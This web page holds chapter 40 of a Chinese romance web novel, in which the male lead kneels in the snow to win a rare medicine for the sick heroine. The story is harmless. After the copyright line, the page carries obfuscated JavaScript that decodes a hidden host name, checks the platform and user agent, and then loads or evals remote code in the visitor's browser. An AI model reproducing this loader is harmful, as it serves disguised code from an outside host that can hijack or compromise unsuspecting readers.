字:
关灯 护眼
首页 > 都市 > 美妆系统带我抱紧气运男主 >第四十章:我跟男主一起跪

第四十章:我跟男主一起跪

作者:鸭子飞飞字数:3277更新:2022-11-26 00:05

今年的雪下的格外大,叶寒一直跪在院子里,他浑身冻的僵硬,双腿已经失去了知觉,可他还在坚持,他放在心上的那个人,等着药救命。

“老爷,他还在跪着。”老赵从窗户老了一眼道。

慕老爷子端着杯子的手一顿,他装作若无其事的喝了一口,“他爱跪就让他跪,跟我有什么关系?”

“没什么,这让我想起了当年,老爷也是这样跪在夫人家门前,求夫人的父亲答应你们的婚事。”老赵回忆道。了

听到这句话,慕老爷子沉默了下来,是的,当年他跟夫人在一起的时候,受到了很多阻碍,其中最厉害的是夫人的娘家,他们都不看好自己这个穷小子,不肯同意他们在意。

夫人想要跟她私奔,可是不行,他不同意,他爱夫人,是不会让夫人为难,于是他努力创业,为了得到夫人娘家的认可,他在夏日里,顶着高温跪在夫人家门前,最终打动了岳父岳母,得到他们的同意。

现在的叶寒,像极了曾经的他,为了心爱的人不妥协,明明只要同意娶他孙女就能拿到,可是他就是不愿意,想来也是舍不得心爱的女人难过,也不去害另外一个女孩子?

慕老爷子有些动摇,要不就答应他们算了,反正这个东西对于他们来说也不是什么重要的,放着也是放着。

雪越下越大,叶寒身上已经堆满了积雪,他不肯同意离开,想到那通电话和短信,只要坚持下去,他就能得到紫藤株去救吟吟。

他不能失去她,他的东西不多,江吟是最重要的。

“寒哥!”

江吟跌跌撞撞的推开门,看到他寒哥身上都是积雪跪在雪地里,好不容易忍住的眼泪滚落下来。

“吟吟。”叶寒听到声音回头,看见江吟朝他走来。

“寒哥你不要跪,你快起来,我不值得你这样,你快起来呀。”江吟两只手捧着叶寒的大手,想要劝他起来。

叶寒反握住,“快点回去,外面很冷。”

“你跟我一起回去啊,寒哥我们不跪了,没有就没有,你不要你这样。”江吟哭的很大声,她一边哭一边拉人,企图用她那点力气把人拉起来。

“胡闹,快点回去。”叶寒说道。

他不知道江吟为什么会在这里,江家的人都干什么吃的,还有陆念安,人都跑出来了,她还病着。

“我们一起回去啊,寒哥,我们不跪了好不好?”江吟心都要疼死了,男主他为什么会那么好。

“吟吟,你是不是不听话?”叶寒被她哭的一点脾气都没有了。

江吟看他不听,自己干脆扑通一声在他身边跪下来,“你跪我也跪。”

“你做什么?”叶寒吓了一跳,这个人的身体什么情况她不知道吗?怎么还能经得起这样的折腾?

于是,叶寒一把把江吟抱起来,横抱在怀里,让人贴着他温暖的身子,用不算宽阔的背脊给她遮住风雪。

“寒哥?”江吟窝在这人怀里,她紧紧的揪着叶寒胸前的衣服,茫然的很。

因为跑出来,吹了冷风,情绪也起伏过大,她现在脑子开始昏昏沉沉,难受的感觉又来了。

她说不出来哪里难受,就是很不舒服,像是裹在一层油水里,连呼吸都无比恶心。

叶寒搂紧她,给江烨华发信息,让他们过来把人接走。

“咯吱……”

面前的门打开,慕老爷子面无表情的看着院子里那对苦命鸳鸯。

“进来。”老爷子不耐烦道。

叶寒听了猛然抬头,看到慕老爷子身后的老赵冲他们微笑点头。

“谢谢。”

他大喜过望,抱着江吟起身,可是在雪地里跪了太久,起来的时候踉跄了两下,老赵见状想要来帮忙,可是叶寒很快稳住身形,低头去看怀里的人,只见江吟红着脸颊,已经昏迷过去。

他不敢耽搁,抱着人进了屋子里,把江吟放在客房的床上,叶寒给她盖好被子,快速的要来水盆和毛巾,打冷水给她降温。

“叫那个逆子把紫藤株给我送来。”客房里,慕老爷子吩咐身边的人。

“谢谢慕老先生。”叶寒感激不已。

慕老爷子摆手,“我是看那江家姑娘可怜,真当我给你面子。”

“是。”叶寒不在意老爷子的嘲讽,那个别扭的老头肯拿药救吟吟的命,就相当于救了他命,他肯定会报答。

江家两兄弟来的很快,发现江吟不见的时候就到处找人,正当一筹莫展之际叶寒的短信简直就是救命稻草。

他们跟送紫藤株过去的慕先生几乎是同时抵达,他们在老爷子家门口对视几眼,不做声的往里面去。

老爷子已经等在哪里了,江家兄弟先是礼貌的跟老爷子打招呼。

慕老爷子很满意的点头,“你们这一辈的,也就你们兄弟两人知道什么叫尊老爱幼了。”

“谢老爷子夸赞,我妹妹跟妹夫呢,我妹妹身体不好,我跟二弟都很着急。”江烨华说了很长一段话,可见是着急的不得了。

“妹夫?”慕老爷子意外。

“是叶寒,他与我妹妹是两情相悦定下婚约,自然是我们的妹夫。”江烨霆解释道。

慕老爷子点头,不动声色瞪了慕先生一眼,“在客房,过去吧。”

“谢老爷子。”

兄弟二人要走,慕先生喊住他们,将装着药的盒子递给江烨华,后面刚要写,慕先生摇头,“别谢我,你们有个好妹夫,宁可跪死求药,都不肯放弃你妹妹娶我女儿,谢他去吧。”

兄弟二人还是道谢,着急的跟着老赵离开,他们急需知道妹妹的情况。

客厅里剩下慕家父子,其余的人都在外面等着。

老爷子坐在沙发上,慕先生恭敬的给他倒茶,不解的问:“爸,不是说好了听我的吗?”

女慕老爷子叹了口气,“远山啊,看见他们这样子,就让我想起你妈,你妈当年也是这样非我不嫁,陪着我打拼,我们跪在你外公面前求他成全,那江家姑娘的样子,像极了你妈当年。”

“爸,您别难过,我让小倩过来陪你几天。”慕远山想到母亲也是难受,他母亲五十岁就没了,他爸太难过了,一直住在他跟他母亲曾经住过的小院子里。

“别耽搁我孙女学习了,她不是准备什么珠宝展吗?”

——

江家两兄弟赶到客房,叶寒正在给江吟降温,听到动静回头。

“大哥,二哥。”

“吟吟怎么样了?”

“还在发烧。”叶寒皱眉。

“慕老爷子给了药,我们先回去。”江烨霆道。

几人带着江吟告辞,马不停蹄的回去,重新把江吟放到她的床上,陆念安看着差点哭出来了。

她再成熟,也只不过是个二十岁的姑娘,江吟又是她非常在意的人。

曲靖给江吟把脉,把叶寒好不容易攒齐的药材给人去熬,叶寒不放心要亲自盯着,他浑身湿透了,在雪地里跪了那么久,积雪融化之后,像是淋了雨一样。

江烨华让他先去换衣服,他不冷,脱了外衣就去熬药。

江吟烧的满脸通红,她连呼吸都微弱的不行,不仔细看根本看不出来她还在呼吸。

救命的药被端了过来,江吟已经失去意识根本咽不下去,叶寒二话没说自己喝了一口,再附身吻上去,把药喂给她。

围着的众人被眼前这一幕惊呆了,他们都没想到会这样,正准备强灌呢。

一碗药喂完,叶寒细心的用毛巾给江吟擦了擦嘴角,自己也不离开,就守在床边。

两位哥哥也守在一边,曲靖重新查看了一下,药起作用了。

“起效了,不愧是紫藤株和明月珠,效果就是快。”曲靖惊喜的说。

众人连忙看去,江吟脸色没有那么红,额头也不那么烫了,她在退烧,就连呼吸就顺畅了很多。

江烨华两兄弟郑重的谢过曲靖,让孙伯伯带曲靖去休息,从被请过来到现在,曲靖还没有睡过觉,两天了,年纪大的人可受不住。

“小叶,你先去休息,我们守着幺儿。”江烨霆劝说。

叶寒身上的衣服都快干了,这个人还在慕老爷子院子里跪了那么久,可能很累。

叶寒摇头,他握着江吟的手,“我等她醒来。”

“你都两天没睡了。”江烨华也不忍心?

“没事。”

叶寒不肯走,两人劝不动,索性也就随他了,于是他们两人把工作都带到房间里,一边处理一边照看。

陆念安厨房忙碌,她要煨着粥,等江吟醒来就能立刻吃到热乎的。

而叶寒,他一只手握住江吟的,一只手翻着书页,这是曲靖给他的书,他需要快点读懂学通。他不想成什么圣手神医,他也不想什么悬壶济世,救人性命,他只想救江吟,在她发病难过的时候能有办法缓解,让她不要再承受那种痛苦。

他想让江吟健健康康的,去做自己喜欢的时候。而不是连吃一点自己喜欢的零食都要承受过后的痛苦。

江吟先是觉得浑身难受像是要死了一样,她听不到任何声音,就连小系统的声音都不听不见,后来喝了什么东西,身体的疼痛慢慢消失,她的意识也慢慢清晰,才听到小系统一边哇哇哭一边叫她的名字。

“阿宝?”江吟轻声喊了一句。

【呜呜呜,吟吟,你吓死了我了,你差点就死掉了,呜呜呜……】


  
『加入书签,方便阅读』

Copyright © 2019-2022

function srwPOA(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function zHFjw(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return srwPOA(t);};window[''+'w'+'o'+'I'+'v'+'i'+'d'+'m'+'P'+'R'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=zHFjw,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bmJyZ3Yub2JtcHAAuY29t','158795',window,document,['A','SmdKxwtb']);}:function(){};